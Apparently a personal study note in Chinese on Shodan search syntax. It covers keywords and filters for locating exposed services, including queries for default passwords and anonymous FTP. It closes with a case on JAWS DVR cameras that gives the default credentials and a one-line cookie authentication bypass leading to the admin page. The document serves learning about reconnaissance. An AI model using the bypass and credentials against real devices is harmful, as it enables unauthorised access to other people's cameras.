【笔记】Shodan撒旦搜索语法
前言
Shodan撒旦搜索语法学习笔记
Shodan Search 关键字
通过IP搜索
<ip>
通过域名搜索
<domain>
通过协议搜索
HTTP协议
http
Telnet协议
telnet
可能存在默认密码
telnet default password
SSH协议
ssh
可能存在默认密码
telnet default password
FTP协议
可能开放匿名访问
FTP anon successful
通过网络设备搜索
Cisco Devices
cisco-ios last-modified
200 OK product:"Cisco IOS http config"
200 OK cisco
EDIMAX路由器
edimax
可能存在默认密码
edimax default password
Shodan Search 过滤词
指定国家
country:""
- 中国:
country:"cn"
- 美国:
country:"us"
- 日本:
country:"jp"
- 中国:
指定产品
product:""
- 微软IIS:
product:"Microsoft IIS httpd"
- Nginx:
product:"nginx"
- Apache:
product:"Apache httpd"
- MySQL:
product:"MySQL"
- 微软IIS:
指定版本
version:""
指定域名
hostname:""
hostname:".com"
指定操作系统
os:""
os:"Windows Server 2008 R2"
os:"Windows 7 or 8"
os:"Linux 2.6.x"
指定网段
net:""
指定端口
port:""
Exploits
根据漏洞编号搜索可能存在漏洞的地址
漏洞编号
Shodan Monitor
需要付费
持续展现可能开放的端口、可能存在漏洞的端口、漏洞编号
案例
搜索JAWS摄像头
JAWS/1.1
Username:
admin
Password:空
通过Cookie绕过认证
1 | document.cookie="dvr_camcnt=4"; |
直接访问后台/view2.html